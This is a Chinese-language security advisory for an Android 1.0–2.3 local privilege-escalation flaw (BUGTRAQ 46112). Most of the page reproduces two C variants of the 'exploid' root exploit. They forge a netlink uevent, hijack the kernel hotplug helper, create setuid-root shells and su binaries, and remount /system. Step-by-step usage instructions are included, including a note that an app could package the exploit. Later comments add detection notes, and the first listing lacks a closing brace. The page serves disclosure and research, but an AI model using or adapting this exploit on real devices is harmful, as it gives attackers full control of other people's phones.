

发布日期:2011-02-04
更新日期:2011-02-04
受影响系统:
Open Handset Alliance Open Handset Alliance Android 1.0 - 2.3
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 46112
Android是Google通过Open Handset Alliance发起的项目,用于为移动设备提供完整的软件集,包括操作系统、中间件等。Open Handset Alliance Android在实现上存在本地权限提升漏洞,本地攻击者可利用此漏洞提升权限,从而完全控制设备。
<*来源:The Android Exploid Crew
  *>测试方法:
--------------------------------------------------------------------------------
警告:以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
The Android Exploid Crew 提供了如下测试方法:
/* android 1.x/2.x the real youdev feat. init local root exploit.
*
*
* Modifications to original exploit for HTC Wildfire Stage 1 soft-root (c) 2010 Martin Paul Eve
* Changes:
* -- Will not remount /system rw (NAND protection renders this pointless)
* -- Doesn't copy self, merely chmods permissions of original executable
* -- No password required for rootshell (designed to be immediately removed once su binary is in place)
*
* Revised usage instructions:
* -- Copy to /sqlite_stmt_journals/exploid and /sqlite_stmt_journals/su
* -- chmod exploid to 755
* -- Execute the binary
* -- Enable or disable a hotplug item (wifi, bluetooth etc. -- this could be done automatically by an app that packaged this exploit) -- don't worry that it segfaults
* -- Execute it again to gain rootshell
* -- Copy to device (/sqlite_stmt_journals/) + chown/chmod su to 04711
* -- Delete original exploid
* -- Use modified Superuser app with misplaced su binary
*
* Explanatory notes:
* -- This is designed to be used with a modified superuser app (not yet written) which will use the su binary in /sqlite_stmt_journals/
* -- It is important that you delete the original exploid binary because, otherwise, any application can gain root
*
* Original copyright/usage information
*
* (C) 2009/2010 by The Android Exploid Crew.
*
* Copy from sdcard to /sqlite_stmt_journals/exploid, chmod 0755 and run.
* Or use /data/local/tmp if available (thx to ioerror!) It is important to
* use /sqlite_stmt_journals directory if available.
* Then try to invoke hotplug by clicking Settings->Wireless->{Airplane,WiFi etc}
* or use USB keys etc. This will invoke hotplug which is actually
* our exploit making /system/bin/rootshell.
* This exploit requires /etc/firmware directory, e.g. it will
* run on real devices and not inside the emulator.
* I'd like to have this exploited by using the same blockdevice trick
* as in udev, but internal structures only allow world writable char
* devices, not block devices, so I used the firmware subsystem.
*
* !!!This is PoC code for educational purposes only!!!
* If you run it, it might crash your device and make it unusable!
* So you use it at your own risk!
*
* Thx to all the TAEC supporters.
*
*/
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <linux/netlink.h>
#include <fcntl.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <signal.h>
#include <sys/mount.h>

/*
 * Print the errno description for msg and terminate.
 * The exit status is the current errno, so if errno happens to be 0 the
 * process exits with status 0 even though this is an error path.
 */
void die(const char *msg)
{
    perror(msg);
    exit(errno);
}

/*
 * Reset /proc/sys/kernel/hotplug: the file is opened O_WRONLY|O_TRUNC and a
 * single NUL byte is written.  The open() result is not checked, so on
 * failure write()/close() are called on -1.  A non-init process writing to
 * this sysctl is itself a useful detection signal.
 */
void clear_hotplug()
{
    int ofd = open("/proc/sys/kernel/hotplug", O_WRONLY|O_TRUNC);
    write(ofd, "", 1);
    close(ofd);
}

/*
 * Replace the current process with /system/bin/sh as uid/gid 0, passing the
 * caller's environment through unchanged.  setuid()/setgid() return values
 * are not checked; die() is reached only if execve() itself fails.
 * `pwd` is declared but never used.
 */
void rootshell(char **env)
{
    char pwd[128];
    char *sh[] = {"/system/bin/sh", 0};
    setuid(0); setgid(0);
    execve(*sh, sh, env);
    die("[-] execve");
}
/*
 * Entry point.  Behaviour is selected by the effective uid:
 *  - euid 0 and uid != 0 (the binary was started setuid-root): exec a root
 *    shell immediately via rootshell();
 *  - euid 0 otherwise (per the header comment, this happens when the kernel
 *    re-invokes the binary as the hotplug helper): clear the hotplug sysctl,
 *    make this executable and /sqlite_stmt_journals/su setuid root, return;
 *  - unprivileged: stage the files loading/hotplug/data in basedir and send
 *    one forged "add" uevent addressed to nl_pid 1 over a
 *    NETLINK_KOBJECT_UEVENT socket, then return.
 *
 * Defender notes, all derived from the code below:
 *  - the trigger is a user process creating a NETLINK_KOBJECT_UEVENT socket
 *    and sending to nl_pid 1; the kernel-side mitigation for this bug class
 *    is to reject uevent messages that do not originate from the kernel
 *    (NOTE(review): confirm against the vendor patch referenced on the page);
 *  - on-disk artifacts: files named loading/hotplug/data in
 *    /sqlite_stmt_journals or /data/local/tmp, a symlink named data pointing
 *    at /proc/sys/kernel/hotplug, and setuid-root files in those directories.
 *
 * argc/argv are unused; env is only forwarded to rootshell().
 * The printf() strings end in a space rather than a newline — presumably
 * the "\n" escapes were lost when the listing was published.
 */
int main(int argc, char **argv, char **env)
{
    char buf[512], path[512];
    int ofd;
    struct sockaddr_nl snl;
    /* Single scatter/gather element covering the whole message buffer. */
    struct iovec iov = {buf, sizeof(buf)};
    /* Positional msghdr init: msg_name=&snl, msg_namelen, msg_iov=&iov,
     * msg_iovlen=1, msg_control=NULL, msg_controllen=0, msg_flags=0. */
    struct msghdr msg = {&snl, sizeof(snl), &iov, 1, NULL, 0, 0};
    int sock;
    char *basedir = NULL, *logmessage;   /* logmessage is never used */
    /* I hope there is no LD_ bug in androids rtld :) */
    if (geteuid() == 0 && getuid() != 0)
        rootshell(env);
    /* readlink() does not NUL-terminate path; the later strlen()/%s uses
     * rely on the link target being shorter than sizeof(path). */
    if (readlink("/proc/self/exe", path, sizeof(path)) < 0)
        die("[-] readlink");
    if (geteuid() == 0) {
        clear_hotplug();

        /* Make this executable owned by root and setuid (04711). */
        chown(path, 0, 0);
        chmod(path, 04711);

        /* Make the staged su binary root-owned and setuid+setgid (06755).
         * chown()/chmod() results are not checked. */
        chown("/sqlite_stmt_journals/su", 0, 0);
        chmod("/sqlite_stmt_journals/su", 06755);
        return 0;
    }
    printf("[*] Android local root exploid (C) The Android Exploid Crew ");
    printf("[*] Modified by Martin Paul Eve for Wildfire Stage 1 soft-root ");
    /* Working directory preference: /sqlite_stmt_journals, then
     * /data/local/tmp, then whatever the current directory is. */
    basedir = "/sqlite_stmt_journals";
    if (chdir(basedir) < 0) {
        basedir = "/data/local/tmp";
        if (chdir(basedir) < 0)
            basedir = strdup(getcwd(buf, sizeof(buf)));   /* never freed */
    }
    printf("[+] Using basedir=%s, path=%s ", basedir, path);
    printf("[+] opening NETLINK_KOBJECT_UEVENT socket ");
    /* Destination is netlink pid 1 (init), not the kernel (pid 0). */
    memset(&snl, 0, sizeof(snl));
    snl.nl_pid = 1;
    snl.nl_family = AF_NETLINK;
    if ((sock = socket(PF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT)) < 0)
        die("[-] socket");
    /* Stage three entries in basedir: an empty world-writable "loading",
     * a "hotplug" file whose content is this binary's own path, and a
     * symlink "data" -> /proc/sys/kernel/hotplug.  The names loading/data
     * mirror the sysfs firmware-loader interface (see the header comment's
     * remark about the firmware subsystem); symlink() is unchecked. */
    close(creat("loading", 0666));
    if ((ofd = creat("hotplug", 0644)) < 0)
        die("[-] creat");
    if (write(ofd, path , strlen(path)) < 0)
        die("[-] write");
    close(ofd);
    symlink("/proc/sys/kernel/hotplug", "data");
    /* Build the NUL-separated uevent key/value list.  DEVPATH and FIRMWARE
     * both embed basedir with leading "..", i.e. relative-path traversal
     * out of the directories the receiver would normally prefix. */
    snprintf(buf, sizeof(buf), "ACTION=add%cDEVPATH=/..%s%c"
             "SUBSYSTEM=firmware%c"
             "FIRMWARE=../../..%s/hotplug%c", 0, basedir, 0, 0, basedir, 0);
    printf("[+] sending add message ... ");
    /* Note: the whole 512-byte buffer is sent, not just the formatted part. */
    if (sendmsg(sock, &msg, 0) < 0)
        die("[-] sendmsg");
    close(sock);
    printf("[*] Try to invoke hotplug now, clicking at the wireless "
           "[*] settings, plugin USB key etc. "
           "[*] You succeeded if you find /system/bin/rootshell. "
           "[*] GUI might hang/restart meanwhile so be patient. ");
    return 0;
    /* NOTE: the closing brace of main() is missing from the listing as
     * published on this page; the second listing below begins directly. */

/* android 1.x/2.x the real youdev feat. init local root exploit.
* (C) 2009/2010 by The Android Exploid Crew.
*
* Copy from sdcard to /sqlite_stmt_journals/exploid, chmod 0755 and run.
* Or use /data/local/tmp if available (thx to ioerror!) It is important to
* use /sqlite_stmt_journals directory if available.
* Then try to invoke hotplug by clicking Settings->Wireless->{Airplane,WiFi etc}
* or use USB keys etc. This will invoke hotplug which is actually
* our exploit making /system/bin/rootshell.
* This exploit requires /etc/firmware directory, e.g. it will
* run on real devices and not inside the emulator.
* I'd like to have this exploited by using the same blockdevice trick
* as in udev, but internal structures only allow world writable char
* devices, not block devices, so I used the firmware subsystem.
*
* !!!This is PoC code for educational purposes only!!!
* If you run it, it might crash your device and make it unusable!
* So you use it at your own risk!
*
* Thx to all the TAEC supporters.
*/
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <linux/netlink.h>
#include <fcntl.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <signal.h>
#include <sys/mount.h>
/* Not referenced anywhere in this listing (a leftover from the original
 * exploid, which the first listing's header says used a rootshell password). */
#define SECRET "secretlol"
/*
 * Print the errno description for msg and terminate.
 * The exit status is the current errno, so an errno of 0 yields status 0
 * even though this is an error path.
 */
void die(const char *msg)
{
    perror(msg);
    exit(errno);
}
/*
 * Copy the file at `from` to `to`, creating/truncating `to` with mode 0600.
 * Any open()/read() failure or short write() terminates the process via
 * die().  The 0x1000-byte buffer is reused per iteration; after both
 * descriptors are closed sync() is called twice.
 */
void copy(const char *from, const char *to)
{
    int fd1, fd2;
    char buf[0x1000];
    ssize_t r = 0;
    if ((fd1 = open(from, O_RDONLY)) < 0)
        die("[-] open");
    if ((fd2 = open(to, O_RDWR|O_CREAT|O_TRUNC, 0600)) < 0)
        die("[-] open");
    for (;;) {
        r = read(fd1, buf, sizeof(buf));
        if (r < 0)
            die("[-] read");
        if (r == 0)
            break;   /* EOF */
        /* A partial write is treated as a fatal error rather than retried. */
        if (write(fd2, buf, r) != r)
            die("[-] write");
    }
    close(fd1);
    close(fd2);
    sync(); sync();
}
/*
 * Reset /proc/sys/kernel/hotplug: open O_WRONLY|O_TRUNC and write a single
 * NUL byte.  The open() result is not checked, so on failure write()/close()
 * operate on -1.  Writes to this sysctl from anything other than init are
 * worth alerting on.
 */
void clear_hotplug()
{
    int ofd = open("/proc/sys/kernel/hotplug", O_WRONLY|O_TRUNC);
    write(ofd, "", 1);
    close(ofd);
}
/*
 * Entry point of the second (Galaxy S / "easyroot") variant.  Behaviour is
 * selected by geteuid():
 *  - euid 0 (per the header comment, when the kernel re-invokes this binary
 *    as the hotplug helper): clear the hotplug sysctl, remount /system
 *    read-write, copy su and Superuser.apk from the easyroot app's files
 *    directory into /system, set their modes, then spin forever;
 *  - unprivileged: stage loading/hotplug/data in basedir, send one forged
 *    "add" uevent addressed to nl_pid 1 over NETLINK_KOBJECT_UEVENT,
 *    sleep 3 seconds and return.
 *
 * Defender notes, all derived from the code below:
 *  - trigger: a user process creating a NETLINK_KOBJECT_UEVENT socket and
 *    sending to nl_pid 1; the kernel-side mitigation for this bug class is
 *    to reject uevent messages not originating from the kernel
 *    (NOTE(review): confirm against the vendor patch referenced on the page);
 *  - artifacts: files loading/hotplug/data and a symlink data ->
 *    /proc/sys/kernel/hotplug in the app files directory or /data/local/tmp;
 *    /system remounted rw; new setuid files under /system/bin and
 *    /system/app.
 *
 * argc/argv/env are unused in this variant; the rootshell() call is
 * commented out and rootshell() is not defined in this listing.
 * The printf() string ends in a space rather than a newline — presumably
 * the "\n" escape was lost when the listing was published.
 */
int main(int argc, char **argv, char **env)
{
    char buf[512], path[512];
    int ofd;
    struct sockaddr_nl snl;
    /* Single scatter/gather element covering the whole message buffer. */
    struct iovec iov = {buf, sizeof(buf)};
    /* Positional msghdr init: msg_name=&snl, msg_namelen, msg_iov=&iov,
     * msg_iovlen=1, msg_control=NULL, msg_controllen=0, msg_flags=0. */
    struct msghdr msg = {&snl, sizeof(snl), &iov, 1, NULL, 0, 0};
    int sock;
    char *basedir = NULL;
    /* I hope there is no LD_ bug in androids rtld :) */
    /*if (geteuid() == 0 && getuid() != 0)
    rootshell(env);*/
    /* readlink() does not NUL-terminate path; the later strlen()/%s uses
     * rely on the link target being shorter than sizeof(path). */
    if (readlink("/proc/self/exe", path, sizeof(path)) < 0)
        die("[-] readlink");
    if (geteuid() == 0) {
        clear_hotplug();
        /* remount /system rw */
        //DROID 1 and Ally
        //mount("/dev/block/mtdblock4", "/system", "yaffs2", MS_REMOUNT, 0);
        //DROID X
        //mount("/dev/block/mmcblk1p21", "/system", "ext3", MS_REMOUNT, 0);
        //GALAXY S
        /* Only the Galaxy S line is active; the mount() result is unchecked,
         * so the copies below are attempted even if the remount failed. */
        mount("/dev/block/stl9","/system", "rfs", MS_REMOUNT, 0);
        //Eris and HTC Hero
        //mount("/dev/block/mtdblock3", "/system", "yaffs2", MS_REMOUNT, 0);
        //copy("/sdcard/su","/system/bin/su");
        //copy("/sdcard/Superuser.apk","/system/app/Superuser.apk");
        copy("/data/data/com.unstableapps.easyroot/files/su","/system/bin/su");
        copy("/data/data/com.unstableapps.easyroot/files/Superuser.apk","/system/app/Superuser.apk");
        /* su becomes setuid-root (04755); the setuid bit on the APK (04744)
         * is unusual for a package file.  chmod() results are unchecked. */
        chmod("/system/bin/su", 04755);
        chmod("/system/app/Superuser.apk", 04744);
        /* Busy-loop forever instead of returning: the helper process stays
         * alive (and burns CPU) after the copies complete. */
        for (;;);
    }
    //basedir = "/sqlite_stmt_journals";
    /* Working directory preference: the easyroot app's files directory,
     * then /data/local/tmp, then the current directory. */
    basedir = "/data/data/com.unstableapps.easyroot/files";
    if (chdir(basedir) < 0) {
        basedir = "/data/local/tmp";
        if (chdir(basedir) < 0)
            basedir = strdup(getcwd(buf, sizeof(buf)));   /* never freed */
    }
    /* Destination is netlink pid 1 (init), not the kernel (pid 0). */
    memset(&snl, 0, sizeof(snl));
    snl.nl_pid = 1;
    snl.nl_family = AF_NETLINK;
    if ((sock = socket(PF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT)) < 0)
        die("[-] socket");
    /* Stage three entries in basedir: an empty world-writable "loading",
     * a "hotplug" file containing this binary's own path, and a symlink
     * "data" -> /proc/sys/kernel/hotplug.  The names loading/data mirror
     * the sysfs firmware-loader interface (see the header comment's remark
     * about the firmware subsystem); symlink() is unchecked. */
    close(creat("loading", 0666));
    if ((ofd = creat("hotplug", 0644)) < 0)
        die("[-] creat");
    if (write(ofd, path , strlen(path)) < 0)
        die("[-] write");
    close(ofd);
    symlink("/proc/sys/kernel/hotplug", "data");
    /* Build the NUL-separated uevent key/value list.  DEVPATH and FIRMWARE
     * both embed basedir with leading "..", i.e. relative-path traversal
     * out of the directories the receiver would normally prefix. */
    snprintf(buf, sizeof(buf), "ACTION=add%cDEVPATH=/..%s%c"
            "SUBSYSTEM=firmware%c"
            "FIRMWARE=../../..%s/hotplug%c", 0, basedir, 0, 0, basedir, 0);
    printf("[+] sending add message ... ");
    /* Note: the whole 512-byte buffer is sent, not just the formatted part. */
    if (sendmsg(sock, &msg, 0) < 0)
        die("[-] sendmsg");
    close(sock);
    sleep(3);
    return 0;
}建议:
--------------------------------------------------------------------------------
厂商补丁:Open Handset Alliance
---------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.openhandsetalliance.com/android_overview.html
相关资讯 漏洞
  • Google Chrome 9.0.597.84之前版本多个安全漏洞
  • Tomcat 报本地文件安全管理器漏洞